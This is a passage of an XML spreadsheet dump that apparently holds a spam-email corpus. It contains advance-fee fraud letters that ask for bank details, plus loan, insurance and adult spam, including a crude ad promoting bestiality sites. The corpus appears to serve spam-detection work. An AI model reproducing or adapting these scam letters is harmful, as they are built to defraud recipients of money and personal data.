\nBURKINABE CANNOT STAND AS NEXT OF KIN TO A FOREIGNER.\n\nI AGREE THAT 30 % OF THIS MONEY WILL BE FOR YOU AS FOREIGN PARTNER, IN \nRESPECT TO THE PROVISION OF A FOREIGN ACCOUNT, 10 % WILL BE SET ASIDE FOR \nEXPENSES INCURED DURING THE BUSINESS AND 60 % WOULD BE FOR ME AND MY \nCOLLEAGUES.\n\nTHEN AFTER I AND MY COLLEAGUES WILL VISIT YOUR COUNTRY FOR DISBURSEMENT \nACCODING TO THE PERCENTAGES INDICATED.\n\nTHEREFORE TO ENABLE THE IMMEDIATE TRNANSFER OF THIS FUND TO YOU AS ARRANGED, \nYOU MUST APPLY FIRST TO THE BANK AS RELATIONS OR NEXT OF KIN OF THE DECEASED \nINDICATING YOUR BANK NAME, YOUR BANK ACCOUNT NUMBER, YOUR PRIVATE TELEPHONE \nAND FAX NUMBER FOR EASY AND EFFECTIVE COMMUNICATION AND LOCATION WHERE IN \nTHE MONEY WILL BE REMITTED . UPON RECEIPT OF YOUR REPLY, I WILL SEND TO YOU \nBY FAX OR EMAIL THE TEXT OF THE APPLICATION.\n\nI WILL NOT FAIL TO BRING TO YOUR NOTICE THAT THIS TRANSACTION IS HITCH FREE \nAND THAT YOU SHOULD NOT ENTERTAIN ANY ATOM OF FEAR AS ALL REQUIRED \nARRANGEMENTS HAVE BEEN MADE FOR THE TRANSFER . YOU SHOULD CONTACT ME \nIMMEDIATELY AS SOON AS YOU RECEIVE THIS LETTER.\nTRUSTING TO HEAR FROM YOU IMMEDIATELY.\nthanks\nMR MARK AKIMA\n\n_________________________________________________________________\nGagnez des pc Windows Vista avec Live.com [URL]http://www.image-addict.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://news.bbc.co.uk http://www.image-addict.fr</t>
  </si>
  <si>
    <t>2922</t>
  </si>
  <si>
    <t>To: nan\nFrom: javed ahmed &lt;javed_ahmed1952@hotmail.com&gt;\nDate: Thu, 22 Feb 2007 13:07:51 +0000</t>
  </si>
  <si>
    <t>Thu, 22 Feb 2007 13:07:51 +0000</t>
  </si>
  <si>
    <t>javed ahmed &lt;javed_ahmed1952@hotmail.com&gt;</t>
  </si>
  <si>
    <t>TREAT  AS URGENT AND CALL ME"""" 00226 76 63 87 21</t>
  </si>
  <si>
    <t>FROM THE DESK OF MR  JAVED AHMED.\nBILL AND EXCHANGE MANAGER,\nBANK OF AFRICA (B.O.A).\nOUAGADOUGOU, BURKINA FASO\nWEST AFRICA.\n\nDear Friend,\n\nI am the manager of bill and exchange department  BANK OF AFRICA (B.O.A) In \nmy department we discovered an abandoned sum of $15m US dollars ( fifteen \nmillion US dollars) . In an account that belongs to one of our foreign \ncustomer who died along with his entire family in november 1998 in a plane \ncrash.\n\nSince we got information about his death, we have been expecting his next of \nkin to come over and claim his money because we cannot release it unless \nsomebody applies for it as next of kin or relation to the deceased as \nindicated in our banking guidelines but unfortunately we learnt that all his \nsupposed next of kin or relation died alongside with him at the plane crash \nleaving nobody behind for the claim.\n\nIt is therefore upon this discovery that I and other officials in my \ndepartment now decided to make this businness proposal to you and release \nthe money to you as the next of kin or relation to the deceased for safety \nand subsequent disbursement since nobody is coming for it and we dont want \nthis money to go into the Bank treasury as unclaimed Bill.\n\nThe Banking law and guideline here stipulates that if such money remained \nunclamed after five years, the money will be transfered into the Bank \ntreasury as unclaimed fund. The request of foreigner as next of kin in this \nbusiness is occasioned by the fact that the customer was a foreigner and a \nBurkinabe cannot stand as next of kin to a foreigner. We agree that 30 % of \nthis money will be for you as foreign partner, in respect to the provision \nof a foreign account, 10 % will be set aside for expenses incured during the \nbusiness and 60 % would be for me and my colleagues.\n\nThen after I and my colleagues will visit your country for disbursement \naccoding to the percentages indicated. Therefore to enable the immediate \ntrnansfer of this fund to you as arranged, you must apply first to the bank \nas relations or next of kin of the deceased indicating your bank name, your \nbank account number, your private telephone and fax number for easy and \neffective communication and location where in the money will be remitted . \nUpon receipt of your reply, I will send to you by fax or email the text of \nthe application.\n\nI will not fail to bring to your notice that this transaction is hitch free \nand that you should not entertain any atom of fear as all required \narrangements have been made for the transfer . you should contact me \nimmediately as soon as you receive this letter. Trusting to hear from you \nimmediately.  PLEASE MY DEAR  FRIEND THIS IS MY PRIVATE LINE YOU CAN  CALL   \nME IMMIDEATELY YOU RECEIVE THIS MAIL.  00226 (76  63  87 21)\n\nTHANKS\nMR JAVED AHMED.\nB.O.A (BANK OF AFRICA)\n\n_________________________________________________________________\nMSN Hotmail : crez votre adresse e-mail gratuite &amp;  vie ! \n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>1649</t>
  </si>
  <si>
    <t>To: nan\nFrom: STEPHEN AYLING &lt;aylingstephen@virgilio.it&gt;\nDate: Thu, 22 Dec 2005 23:42:45 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Dec 2005 23:42:45 +0100</t>
  </si>
  <si>
    <t>STEPHEN AYLING &lt;aylingstephen@virgilio.it&gt;</t>
  </si>
  <si>
    <t>\n\n\nHello,\n\nI wish to accost you with a request that would be of immense \nbenefit to both of us. Being an executor of wills, it is possible that \nwe may be tempted to make fortune out of our client's situations, when \nwe cannot help it, or left with no better option. The issue I am \npresenting to you is a case of my client who willed a fortune to his \nnext-of-kin. It was most unfortunate that he and his next-of-kin died \non the same day the 31st October 1999 in an Egyptian airline 990 with \nother passengers on board. You can confirm this from the website below \nwhich was published by BBC WORLD NEWS.\n\n WEBSITE.\n[URL]http://news.bbc.co[/URL]\nuk/1/hi/world/americas/502503.stm.\n \nI am now faced with confusion of \nwho to pass the fortune to.\nAccording to the English law, the fortune \nis supposed to be bequeathed to the government,if nobody comes forward \nas the next of kin within seven years of the demise of the benefactor \nof the will. My purpose of contacting you is to seek your acting as the \nbeneficiary of the will, and lay claim to the legacy of $7million, \nwhich my deceased client  bequeathed to his next-of-kin. For now, I \nalone know about his will, as my client had great confidence in me.\n\nEverything will be left between you and I. The share would be 25% for \nyou and 75% for me. I would want to give a huge part of my share to the \ntsunami victims,\nas this is my primary objective. All I have to do is \namend the will or add a codicil to make you the beneficiary to the \n$7million legacy.\n\nAgain, I feel that you may apprehensive and consider \nthis amount too big for you to defend. It does not matter, as there are \ndocuments to back it up. \nThis is a legacy being passed on to a next-of-\nkin. As I am not very sure of getting your consent on the issue I \nprefer not to divulge my full identity so as not to risk being \ndisbarred. The English Bar considers it a breach of the oath of the \nEnglish Bar. I need not emphasize to you that the sensitivity of this \nissue need not be toyed with by neglecting its confidentiality. I \ntherefore appeal to you not discuss this request with anybody, even if \nyou decline my request.\n\nI look forward to hearing from you soon.\n\nYours truly\n\nStephen Ayling. \n \n \n \n \n\n\n</t>
  </si>
  <si>
    <t>4188</t>
  </si>
  <si>
    <t>To: &lt;Valued.Recipient@webnote.net&gt;\nFrom: approvals@mindspring.com\nDate: Thu, 22 Aug 2002 20:49:30 -1800</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 20:49:30 -1800</t>
  </si>
  <si>
    <t>approvals@mindspring.com</t>
  </si>
  <si>
    <t>&lt;Valued.Recipient@webnote.net&gt;</t>
  </si>
  <si>
    <t>MSNBC: Rates Hit 35 year Low 4.75% ...12304</t>
  </si>
  <si>
    <t>===================================================================\n\nNow you can have HUNDREDS of lenders compete for your loan!\n\nFACT: Interest Rates are at their lowest point in 40 years!\n\nYou're eligible even with less than perfect credit !!\n\n	* Refinancing\n	* New Home Loans\n	* Debt Consolidation\n	* Debt Consultation\n	* Auto Loans\n	* Credit Cards\n	* Student Loans\n	* Second Mortgage\n	* Home Equity\n\nThis Service is 100% FREE without any obligation.\n\nVisit Our Web Site at:  [URL]http://marketing-fashion.com[/URL]\n\n====================================================================\n\nTo Unsubscribe: [URL]http://marketing-fashion.com[/URL]</t>
  </si>
  <si>
    <t>http://marketing-fashion.com http://marketing-fashion.com</t>
  </si>
  <si>
    <t>4113</t>
  </si>
  <si>
    <t>To: &lt;zzzz@spamassassin.taint.org&gt;\nFrom: "IQ Campus" &lt;iq@insurancemail.net&gt;\nDate: Thu, 22 Aug 2002 19:00:32 -0400</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 19:00:32 -0400</t>
  </si>
  <si>
    <t>"IQ Campus" &lt;iq@insurancemail.net&gt;</t>
  </si>
  <si>
    <t>Save 84% on CE Credits</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_3257B2_01C249FA.18BC9920 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit  Save 84% on C.E. Credits &amp; Pre-Licensing Courses    State CE, CLU, CFP, CPA and Securities  Unlimited courses &amp; credits for 24 months  Regular Price:$1298, IQ Price:$199	 *	No Hidden Fees *	Over 16,000 Credits *	Over 300 Courses *	90% Internet Based *	High Quality Courses *	Unlimited Access Complete this form for a FREE Guest Demo!	  Name:	 	  E-mail:	 	  Phone:	 	  City:	 	 State:	 	  	  	     	     We don't want anybody to receive our mailing who does not wish to receive them. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.InsuranceIQ.com[/URL] Legal Notice    ------=_NextPart_000_3257B2_01C249FA.18BC9920 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Save 84% on CE Credits =20            =20                =20               =20                  =20                     =20                        No Hidden Fees Over 16,000 Credits Over 300 Courses =20                        90% Internet Based High Quality Courses Unlimited Access =20                =20                       =20                          =20                              =20                                  =20                                     Complete this form for a FREE Guest = Demo! =20                                     Name: =20                                     E-mail: =20                                     Phone: =20                                     City: State: =20                                       =20                                        We=20           don't want anybody to receive our mailing who does not wish to = receive=20           them. To be removed from this mailing list, DO NOT REPLY to = this message.=20           Instead, go here: [URL]http://www.InsuranceIQ.com[/URL] out Legal = Notice ------=_NextPart_000_3257B2_01C249FA.18BC9920--</t>
  </si>
  <si>
    <t>4103</t>
  </si>
  <si>
    <t>To: JM@NETNOTEINC.COM\nFrom: Great Offers &lt;greatoffers@sendgreatoffers.com&gt;\nDate: Thu, 22 Aug 2002 16:30:32 -0500</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 16:30:32 -0500</t>
  </si>
  <si>
    <t>FREE Cell Phone + $50 Cash Back!</t>
  </si>
  <si>
    <t>FREE Motorola Cell Phone with $50 Cash Back! *Free phone       offer subject to VoiceStream Wireless credit approval. Must activate a new       line of service to receive a free phone. A one-time activation fee of $25       applies to all new activations. Coverage not available in all areas. Offer       fulfilled by SimplyWireless.com, a VoiceStream authorized dealer. See site       for additional offer details.       **$50 mail-in rebate is available for new VoiceStream service plans       $29.99 and greater. Rebate ends 8/31/02. You are receiving this mailing because you are a member of SendGreatOffers.com and subscribed as:JM@NETNOTEINC.COM To unsubscribe  Click Here ([URL]http://admanmail.com[/URL] or reply to this email with REMOVE in the subject line - you must also include the body of this message to be unsubscribed. Any correspondence about the products/services should be directed to the company in the ad. %EM%JM@NETNOTEINC.COM%/EM%</t>
  </si>
  <si>
    <t>4101</t>
  </si>
  <si>
    <t>To: &lt;hurst@missouri.co.jp&gt;\nFrom: hurst@missouri.co.jp\nDate: Thu, 22 Aug 2002 15:45:31 -0600</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 15:45:31 -0600</t>
  </si>
  <si>
    <t>hurst@missouri.co.jp</t>
  </si>
  <si>
    <t>&lt;hurst@missouri.co.jp&gt;</t>
  </si>
  <si>
    <t>^^^^^Cell Phone Belt Clips $1.95^^^^^^                           18070</t>
  </si>
  <si>
    <t>Cellular Phone Accessories All At Below Wholesale Prices!\n\n[URL]http://202.101.163.34[/URL]\n\nHands Free Ear Buds 1.99! \nPhone Holsters 1.98! \nBooster Antennas Only $0.99\nPhone Cases 1.98! \nCar Chargers 1.98! \nFace Plates As Low As 0.99! \nLithium Ion Batteries As Low As 6.94! \n\n[URL]http://202.101.163.34[/URL]\n\nClick Below For Accessories On All NOKIA, MOTOROLA LG, NEXTEL, \nSAMSUNG, QUALCOMM, ERICSSON, AUDIOVOX PHONES At Below \nWHOLESALE PRICES!\n\n[URL]http://202.101.163.34[/URL]\n\n***If You Need Assistance Please Call Us (732) 751-1457***\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nTo be removed from future mailings please send your remove \nrequest to: removemenow68994@btamail.net.cn \nThank You and have a super day :)</t>
  </si>
  <si>
    <t>http://202.101.163.34 http://202.101.163.34 http://202.101.163.34</t>
  </si>
  <si>
    <t>4109</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: "FreeLegal Advice" &lt;jaen@s3.serveimage.com&gt;\nDate: Thu, 22 Aug 2002 13:43:24 -0600</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 13:43:24 -0600</t>
  </si>
  <si>
    <t>"FreeLegal Advice" &lt;jaen@s3.serveimage.com&gt;</t>
  </si>
  <si>
    <t>[ILUG] Get the Child Support You Deserve                     10.132</t>
  </si>
  <si>
    <t>1) Fight The Risk of Cancer!\n[URL]http://www.adclick.ws[/URL]\n\n2) Slim Down - Guaranteed to lose 10-12 lbs in 30 days\n[URL]http://www.adclick.ws[/URL]\n\n3) Get the Child Support You Deserve - Free Legal Advice\n[URL]http://www.adclick.ws[/URL]\n\n4) Join the Web's Fastest Growing Singles Community\n[URL]http://www.adclick.ws[/URL]\n\n5) Start Your Private Photo Album Online!\n[URL]http://www.adclick.ws[/URL]\n\nHave a Wonderful Day,\nOffer Manager\nPrizeMama\n\n\n\n\n\n\n\n\n\n\n\n\n\nIf you wish to leave this list please use the link below.\n[URL]http://www.qves.com[/URL]\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.adclick.ws http://www.adclick.ws http://www.adclick.ws http://www.adclick.ws http://www.adclick.ws http://www.qves.com http://www.linux.ie</t>
  </si>
  <si>
    <t>4097</t>
  </si>
  <si>
    <t>To: mike23@hotmail.com\nFrom: fort@bluemail.dk\nDate: Thu, 22 Aug 2002 13:24:37 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 13:24:37 -0400 (EDT)</t>
  </si>
  <si>
    <t>fort@bluemail.dk</t>
  </si>
  <si>
    <t>mike23@hotmail.com</t>
  </si>
  <si>
    <t>Help wanted.  We are a 14 year old fortune 500 company, that is\ngrowing at a tremendous rate.  We are looking for individuals who\nwant to work from home.\n\nThis is an opportunity to make an excellent income.  No experience\nis required.  We will train you.\n\nSo if you are looking to be employed from home with a career that has\nvast opportunities, then go:\n\n[URL]http://www.basetel.com[/URL]\n\nWe are looking for energetic and self motivated people.  If that is you\nthan click on the link and fill out the form, and one of our\nemployement specialist will contact you.\n\nTo be removed from our link simple go to:\n\n[URL]http://www.basetel.com[/URL]\n\n\n4139vOLW7-758DoDY1425FRhM1-764SMFc8513fCsLl40</t>
  </si>
  <si>
    <t>4098</t>
  </si>
  <si>
    <t>To: JM@NETNOTEINC.COM\nFrom: Great Offers &lt;greatoffers@sendgreatoffers.com&gt;\nDate: Thu, 22 Aug 2002 10:30:04 -0500</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 10:30:04 -0500</t>
  </si>
  <si>
    <t>Is Your Family Protected?</t>
  </si>
  <si>
    <t>| ![]([URL]http://www.reliaquote.com[/URL]  \n---  \n  \n| ![]([URL]http://www.reliaquote.com[/URL]  \n---  \n|  |  |\n\n**Life can change in an instant. That's why it is so important to protect your\nfamily's financial future with sufficient life insurance coverage.**  \n  \n---  \n**![]([URL]http://www.reliaquote.com[/URL]**  \n|  | **State of Residence:** |  Select State Alabama Alaska Arizona Arkansas\nCalifornia Colorado Connecticut Delaware Dist. of Columbia Florida Georgia\nHawaii Idaho Illinois Indiana Iowa Kansas Kentucky Louisiana Maine Maryland\nMassachusetts Michigan Minnesota Mississippi Missouri Montana Nebraska Nevada\nNew Hampshire New Jersey New Mexico New York North Carolina North Dakota Ohio\nOklahoma Oregon Pennsylvania Rhode Island South Carolina South Dakota\nTennessee Texas Utah Vermont Virginia Washington West Virginia Wisconsin\nWyoming  \n---|---  \n**Date of Birth (MM/DD/YY):** |  MM 01 02 03 04 05 06 07 08 09 10 11 12 /  DD\n01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26\n27 28 29 30 31 /  YY 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31\n32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57\n58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83\n84  \n**Sex:** |  |  ** Male** |  ** Female**  \n---|---  \n**Have you used any tobacco products in the last 12 months?** |  |  ** No** |\n** Yes**  \n---|---  \n**Coverage Amount:** |  Select Amount 100,000 125,000 150,000 175,000 200,000\n225,000 250,000 275,000 300,000 325,000 350,000 375,000 400,000 425,000\n450,000 475,000 500,000 550,000 600,000 650,000 700,000 750,000 800,000\n850,000 900,000 950,000 1,000,000 1,250,000 1,500,000 1,750,000 2,000,000\n2,250,000 2,500,000 3,000,000 3,500,000 4,000,000 4,500,000 5,000,000\n6,000,000 7,000,000 8,000,000 9,000,000 10,000,000 11,000,000 12,000,000\n13,000,000 14,000,000 15,000,000  \n**How long do you need the coverage?** |  Select Year 5 Years 10 Years 15\nYears 20 Years 25 Years 30 Years  \n  |  \n![]([URL]http://www.reliaquote.com[/URL]  \n|  |\n\n**ReliaQuote makes it easy and affordable. We can instantly provide you with\nfree quotes from highly rated insurance companies.**  \n  \n---  \n| **Save up to**  \n---  \n![]([URL]http://www.reliaquote.com[/URL]  \n**on Life Insurance**  \n** Compare quotes today.  \nThere is nothing more  \nimportant than protecting  \ntheir future.  \n**  \n  \nCopyright 2001 ReliaQuote, Inc.  \nAll rights reserved.  \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http://www.reliaquote.com http://www.reliaquote.com http://www.reliaquote.com http://www.reliaquote.com http://www.reliaquote.com http://admanmail.com http://admanmail.com</t>
  </si>
  <si>
    <t>4095</t>
  </si>
  <si>
    <t>To: &lt;social@linux.ie&gt;\nFrom: "Slim n Trim" &lt;yenene@mx2.1premio.com&gt;\nDate: Thu, 22 Aug 2002 09:33:07 -0600</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 09:33:07 -0600</t>
  </si>
  <si>
    <t>"Slim n Trim" &lt;yenene@mx2.1premio.com&gt;</t>
  </si>
  <si>
    <t>[ILUG-Social] re: Guaranteed to lose 10-12 lbs in 30 days 10.148</t>
  </si>
  <si>
    <t>I thought you might like these:\n1) Slim Down - Guaranteed to lose 10-12 lbs in 30 days\n[URL]http://www.freeyankee.com[/URL]\n\n2) Fight The Risk of Cancer! \n[URL]http://www.freeyankee.com[/URL] \n\n3) Get the Child Support You Deserve - Free Legal Advice \n[URL]http://www.freeyankee.com[/URL]\n\nOffer Manager\nDaily-Deals\n\n\n\n\n\n\n\n\nIf you wish to leave this list please use the link below.\n[URL]http://www.qves.com[/URL]\n\n\n-- \nIrish Linux Users' Group Social Events: social@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.freeyankee.com http://www.freeyankee.com http://www.freeyankee.com http://www.qves.com http://www.linux.ie</t>
  </si>
  <si>
    <t>4094</t>
  </si>
  <si>
    <t>To: zzzz@spamassassin.taint.org\nFrom: Account Services &lt;wsup@playful.com&gt;\nDate: Thu, 22 Aug 2002 08:13:35 -0700</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 08:13:35 -0700</t>
  </si>
  <si>
    <t>Account Services &lt;wsup@playful.com&gt;</t>
  </si>
  <si>
    <t>Re: Fw: User Name &amp; Password to Membership To 5 Sites zzzz@spamassassin.taint.org pviqg</t>
  </si>
  <si>
    <t>##################################################\n#                                                #\n#                 Adult Club                     #\n#           Offers FREE Membership               #\n#                                                #\n##################################################\n\n&gt;&gt;&gt;&gt;&gt;  INSTANT ACCESS TO ALL SITES NOW\n&gt;&gt;&gt;&gt;&gt;  Your User Name And Password is.\n&gt;&gt;&gt;&gt;&gt;  User Name: zzzz@spamassassin.taint.org\n&gt;&gt;&gt;&gt;&gt;  Password: 760382\n\n5 of the Best Adult Sites on the Internet for FREE!\n---------------------------------------\nNEWS 08/18/02\nWith just over 2.9 Million Members that signed up for FREE, Last month there were 721,184 New\nMembers. Are you one of them yet???\n---------------------------------------\nOur Membership FAQ\n\nQ. Why are you offering free access to 5 adult membership sites for free?\nA. I have advertisers that pay me for ad space so you don't have to pay for membership.\n\nQ. Is it true my membership is for life?\nA. Absolutely you'll never have to pay a cent the advertisers do.\n\nQ. Can I give my account to my friends and family?\nA. Yes, as long they are over the age of 18.\n\nQ. Do I have to sign up for all 5 membership sites?\nA. No just one to get access to all of them.\n\nQ. How do I get started?\nA. Click on one of the following links below to become a member.\n\n- These are multi million dollar operations with policies and rules.\n- Fill in the required info and they won't charge you for the Free pass!\n- If you don't believe us, just read their terms and conditions.\n\n---------------------------\n\n# 5. &gt; Adults Farm\n[URL]http://80.71.66.8[/URL]\nGirls and Animals Getting Freaky....FREE Lifetime Membership!!\n\n# 4. &gt; Sexy Celebes\n[URL]http://80.71.66.8[/URL]\nThousands Of XXX Celebes doing it...FREE Lifetime Membership!!\n\n# 3. &gt; Play House Porn\n[URL]http://80.71.66.8[/URL]\nLive Feeds From 60 Sites And Web Cams...FREE Lifetime Membership!!\n\n# 2. &gt; Asian Sex Fantasies\n[URL]http://80.71.66.8[/URL]\nJapanese Schoolgirls, Live Sex Shows ...FREE Lifetime Membership!!\n\n# 1. &gt; Lesbian Lace\n[URL]http://80.71.66.8[/URL]\nGirls and Girls Getting Freaky! ...FREE Lifetime Membership!!\n\n--------------------------\n\nJennifer Simpson, Miami, FL\nYour FREE lifetime membership has entertained my boyffriend and I for\nthe last two years!  Your Adult Sites are the best on the net!\n\nJoe Morgan Manhattan, NY\nYour live sex shows and live sex cams are unbelievable. The best part\nabout your porn sites, is that they're absolutely FREE!\n\n--------------------------\n\n\n\n\n\n\n\n\n\nRemoval Instructions:\n\nYou have received this advertisement because you have opted in to receive free adult internet\noffers and specials through our affiliated websites. If you do not wish to receive further emails\nor have received the email in error you may opt-out of our database here\n[URL]http://80.71.66.8[/URL] . Please allow 24 hours for removal.\n\nvonolmosatkirekpups</t>
  </si>
  <si>
    <t>4093</t>
  </si>
  <si>
    <t>To: &lt;zzzz@spamassassin.taint.org&gt;\nFrom: "Slim Down" &lt;sabrina@mx3.1premio.com&gt;\nDate: Thu, 22 Aug 2002 07:36:19 -0600</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 07:36:19 -0600</t>
  </si>
  <si>
    <t>"Slim Down" &lt;sabrina@mx3.1premio.com&gt;</t>
  </si>
  <si>
    <t>Guaranteed to lose 10-12 lbs in 30 days                          11.150</t>
  </si>
  <si>
    <t>1) Fight The Risk of Cancer!\n[URL]http://www.adclick.ws[/URL]\n\n2) Slim Down - Guaranteed to lose 10-12 lbs in 30 days\n[URL]http://www.adclick.ws[/URL]\n\n3) Get the Child Support You Deserve - Free Legal Advice\n[URL]http://www.adclick.ws[/URL]\n\n4) Join the Web's Fastest Growing Singles Community\n[URL]http://www.adclick.ws[/URL]\n\n5) Start Your Private Photo Album Online!\n[URL]http://www.adclick.ws[/URL]\n\nHave a Wonderful Day,\nOffer Manager\nPrizeMama\n\n\n\n\n\n\n\n\n\n\n\n\n\nIf you wish to leave this list please use the link below.\n[URL]http://www.qves.com[/URL]</t>
  </si>
  <si>
    <t>http://www.adclick.ws http://www.adclick.ws http://www.adclick.ws http://www.adclick.ws http://www.adclick.ws http://www.qves.com</t>
  </si>
  <si>
    <t>4092</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: "Slim Down" &lt;taylor@s3.serveimage.com&gt;\nDate: Thu, 22 Aug 2002 06:18:18 -0600</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 06:18:18 -0600</t>
  </si>
  <si>
    <t>"Slim Down" &lt;taylor@s3.serveimage.com&gt;</t>
  </si>
  <si>
    <t>[ILUG] Guaranteed to lose 10-12 lbs in 30 days 10.206</t>
  </si>
  <si>
    <t>1) Fight The Risk of Cancer!\n[URL]http://www.adclick.ws[/URL]\n\n2) Slim Down - Guaranteed to lose 10-12 lbs in 30 days\n[URL]http://www.adclick.ws[/URL]\n\n3) Get the Child Support You Deserve - Free Legal Advice\n[URL]http://www.adclick.ws[/URL]\n\n4) Join the Web's Fastest Growing Singles Community\n[URL]http://www.adclick.ws[/URL]\n\n5) Start Your Private Photo Album Online!\n[URL]http://www.adclick.ws[/URL]\n\nHave a Wonderful Day,\nOffer Manager\nPrizeMama\n\n\n\n\n\n\n\n\n\n\n\n\n\nIf you wish to leave this list please use the link below.\n[URL]http://www.qves.com[/URL]\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>3145</t>
  </si>
  <si>
    <t>To: R@C\nFrom: Mr. Nopparat Sujaritpinij &lt;nopparat@indiatimes.com&gt;\nDate: Thu, 21 Jun 2007 10:35:46 +0400</t>
  </si>
  <si>
    <t>Thu, 21 Jun 2007 10:35:46 +0400</t>
  </si>
  <si>
    <t>Mr. Nopparat Sujaritpinij &lt;nopparat@indiatimes.com&gt;</t>
  </si>
  <si>
    <t>R@C</t>
  </si>
  <si>
    <t>please read and get back to me</t>
  </si>
  <si>
    <t xml:space="preserve">Beloved,\n\nI am sorry for my unannounced communication with you especially through this common method but I promise to give you more reasons for this in due course.\n\nI am Nopparat Sujaritpinij from Thailand (nopparat.sujaritpinij@worker.com). I worked with Terry Ford 51, a white farmer in Zimbabwe till his sudden death in March, 2002. My boss, Terry Ford was a rich commercial and successful farmer in Zimbabwe till the land reforms of Mugabe led government which exposed many white farmers to the brutality of the black "war veterans" who in one of their attacks shot and killed him.\n\nIn case you are not familiar with this incident, you can look it up in any international news media like; [URL]http://news.bbc.co.uk[/URL] , [URL]http://www.cbc.ca[/URL]\n\nWell, I am contacting you in respect of a deposited fund which is to the tone of us$16 million which was meant for the purchase of farm tools and accessories. Since his death, I have thought of a way forward but with the continuous stay of the funds with bank, the government may trace it which means a total lost hence I arranged for the withdrawal.\n\nI successfully withdrew the funds and re-deposited it with a private security company as a family treasure. As it is, I am well informed about farming and could do any other business as well but all I need now is a partner to help me in settling down this funds in any account(s) be it personal or company's account.\n\nPlease, is rest assured that it is between me and you and so shall I like it to remain. Again, the funds in question as it is has nothing whatsoever to do with Zimbabwe any longer as I urge you to feel free in dealing with me as no risk is involved.\n\nIn dealing with you, I am ready to compensate your efforts with 17% of the total funds while 3% will be to reimburse any form of expenses from your side otherwise, we can work on partnership in all investments.\n\nI will wait to hear from you as I will be ever ready to supply you with every details of myself as well as that of the transaction.\n\nRegards,\n\nNopparat Sujaritpinij\nnopparat.sujaritpinij@worker.com\n\n\n \n  </t>
  </si>
  <si>
    <t>http://news.bbc.co.uk http://www.cbc.ca</t>
  </si>
  <si>
    <t>1411</t>
  </si>
  <si>
    <t>To: pnkomo@easyinfomail.co.za\nFrom: pnkomo@easyinfomail.co.za\nDate: Thu, 21 Jul 2005 21:10:26 +0000</t>
  </si>
  <si>
    <t>Thu, 21 Jul 2005 21:10:26 +0000</t>
  </si>
  <si>
    <t>pnkomo@easyinfomail.co.za</t>
  </si>
  <si>
    <t>HELLO!!!</t>
  </si>
  <si>
    <t>\nFROM: NKOMO PRINCE WILL\nTel :+27 83 435 6628\nFax:+27 11 507 5049\n\n125 D.F.MALAN DRIVE, SANDTON\nJOHANNESBURG, SOUTH AFRICA.\n\nDear Sir,\n\nNo doubt the letter might come as a surprise to you. I am Mr. PRINCE WILL NKOMO , the son of late Mr. HARRY NKOMO, one of the major victims in the on going crisis in Zimbabwe. You might have heard or read about it, you can visit [URL]www.cnn.com[/URL]\\zimbabwe. I obtained your contact privately and after due consideration and prayers decided to contact you for assistance to transfer and invest our family fund.\n\nMy country Zimbabwe is in real war with no end sight, the president Mr. Robert Mugabe  introduced a new land reform act meant to deprive and relocate all the major farms in Zimbabwe, this now resulted in the Zimbabwe war veterans and black mob killing, looting and displacing the entire farm in Zimbabwe, many has been killed and my father was one of the major  victims, as we own one of the biggest farm in our country.\n\nShortly before his death, he took to South Africa with my mother to deposit the sum of US$20,000,000.00(TWENTY  MILLION UNITED STATES DOLLARS) into a security and finance company in South Africa. It was deposited as a family valuables to avoid attention and high demurrage payment because this money was actually for the building of an ultra modern farms with all the machineries such as pipe-born water, electricity chemicals etc. only that he did not survive to realize this, May His Gentle Soul Rest In Peace.\n\nNow faced with this situation, we decided to exile to South Africa with the rest of the family where we have awaited for things to cool down and have successful claims to the funds .I have in my mother's possession all the necessary documents as regards to the deposit of this fund.\n\nWe had planned to invest this money in South Africa, but because of our status as asylum seekers, the financial laws in South Africa does not allow asylum seekers any investment and financial rights not even to operate a bank accounts in the country until asylum is approved which still pending, more so the nearness of South Africa and my country is not safe for us without a reliable bank account into which we can transfer this money. \n\nDo understand to provide a suitable account to transfer this fund for our resettlement and investments. Can you handle this fund without any problem in your country, if so do contact me on my telephone no as soon as possible for further arrangement as regards to our working plans.\n\nThanks and God bless as I await your sincerely response.\n\nMr  PRINCE WILL NKOMO\n(FOR THE FAMILY).\n\n\n\n\n</t>
  </si>
  <si>
    <t>1410</t>
  </si>
  <si>
    <t>To: nan\nFrom: Eloy Savimbi &lt;mohaelo2@yahoo.com&gt;\nDate: Thu, 21 Jul 2005 18:07:58 +0200</t>
  </si>
  <si>
